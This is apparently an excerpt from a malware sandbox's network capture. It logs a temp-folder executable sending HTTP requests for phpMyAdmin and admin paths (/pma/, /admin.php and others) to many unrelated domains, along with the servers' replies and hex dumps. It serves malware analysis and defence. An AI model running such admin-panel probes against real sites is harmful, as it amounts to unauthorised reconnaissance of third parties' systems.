Nov 30, 2023 11:22:45.564385891 CET	435	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:45 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/pma/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
225	192.168.2.4	53712	104.238.144.219	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.512589931 CET	217	OUT	GET /pma/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:45.643189907 CET	528	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:45 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/pma/ Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/pma/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
226	192.168.2.4	54236	15.197.142.173	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.600986958 CET	222	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: a6a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:45.704026937 CET	418	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:45 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-122-17.ec2.internal X-Request-Id: 1401a095-2499-48a8-95c1-121a12f74c7d Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
227	192.168.2.4	54020	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.634443998 CET	214	OUT	GET /pma/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:45.814464092 CET	435	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:45 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/pma/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
228	192.168.2.4	56078	15.197.172.60	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.745121002 CET	213	OUT	GET /admin HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.114103079 CET	920	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:45 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/admin X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_fmUF5Zl+3+ac8rvGdCer61TUL4TTvmL8lgyWN+urw+HG3bjmRIf+Jecp3z6aV72cWDW+7sHl43YdJoN82yn5Bg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.119.144.89;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
229	192.168.2.4	54459	194.63.248.47	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.767934084 CET	215	OUT	GET /pma/ HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:45.970873117 CET	520	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:45 GMT Server: Apache/2.4.25 (Debian) Location: https://z-a.com/pma/ Content-Length: 277 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 2d 61 2e 63 6f 6d 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://z-a.com/pma/">here</a>.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
230	192.168.2.4	56107	104.238.144.219	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.775952101 CET	218	OUT	GET /admin HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:45.906438112 CET	530	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:45 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/admin Content-Length: 231 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/admin">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
231	192.168.2.4	56532	15.197.142.173	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.954381943 CET	222	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: m7l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.057332993 CET	419	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:46 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-123-165.ec2.internal X-Request-Id: 22621b73-64d7-4b74-916c-a01480afc526 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
232	192.168.2.4	54160	3.33.224.147	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.955600023 CET	216	OUT	GET /admin/ HTTP/1.1 Host: hna.be Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.063910007 CET	500	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 30 Nov 2023 10:22:45 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://hna.be/admin/ X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Nov 30, 2023 11:22:46.269931078 CET	500	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 30 Nov 2023 10:22:45 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://hna.be/admin/ X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
233	192.168.2.4	56482	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.002630949 CET	214	OUT	GET /pma/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.181067944 CET	435	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:46 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/pma/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
234	192.168.2.4	56584	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.099036932 CET	214	OUT	GET /pma/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.277744055 CET	435	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:46 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/pma/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
235	192.168.2.4	56035	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.099792004 CET	219	OUT	GET /admin.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.278322935 CET	440	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:46 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
236	192.168.2.4	56037	15.197.172.60	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.100191116 CET	213	OUT	GET /admin HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.199947119 CET	919	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:46 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/admin X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_fmUF5Zl+3+ac8rvGdCer61TUL4TTvmL8lgyWN+urw+HG3bjmRIf+Jecp3z6aV72cWDW+7sHl43YdJoN82yn5Bg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.88;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:46.406392097 CET	919	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:46 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/admin X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_fmUF5Zl+3+ac8rvGdCer61TUL4TTvmL8lgyWN+urw+HG3bjmRIf+Jecp3z6aV72cWDW+7sHl43YdJoN82yn5Bg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.88;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
237	192.168.2.4	56225	54.209.32.212	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.100383997 CET	222	OUT	GET /admin.php HTTP/1.1 Host: bjail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.199414968 CET	202	IN	HTTP/1.1 302 Found content-length: 0 date: Thu, 30 Nov 2023 10:22:45 GMT location: https://www.hugedomains.com/domain_profile.cfm?d=bjail.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
238	192.168.2.4	56045	157.7.44.171	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.103490114 CET	218	OUT	GET /admin HTTP/1.1 Host: gmaso.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.367472887 CET	653	IN	HTTP/1.1 401 Unauthorized Date: Thu, 30 Nov 2023 10:22:46 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 381 Connection: keep-alive Server: Apache WWW-Authenticate: Basic realm="" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 